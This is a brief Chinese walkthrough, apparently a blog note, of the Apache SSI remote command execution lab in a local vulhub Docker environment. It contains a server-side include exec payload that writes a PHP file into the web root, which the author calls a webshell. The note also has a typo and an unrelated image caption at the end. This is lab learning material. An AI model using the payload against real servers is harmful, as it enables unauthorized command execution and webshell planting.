Apache SSI 远程命令执行漏洞
1.cd到ssi-rce
cd /opt/vulhub/httpd/ssi-rce/
2.执行docker-compose up -d
docker-compose up -d
3.查看靶场是否开启成功
dooker ps
拉取成功了
4.访问url
这里已经执行成功了,注意这里需要加入/upload.php
5.写入一句话木马
<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->
6.提交查询
7.点击shell.shtml
8.查看是否写入成功
docker exec -it ssi-rce_apache_1 /bin/bash
9.获取phpinfo
![洛谷 P5194 [USACO05DEC] Scales S 刷题笔记](https://img-blog.csdnimg.cn/direct/6e26740ffd5f4c708c8332cb162061e8.jpeg)
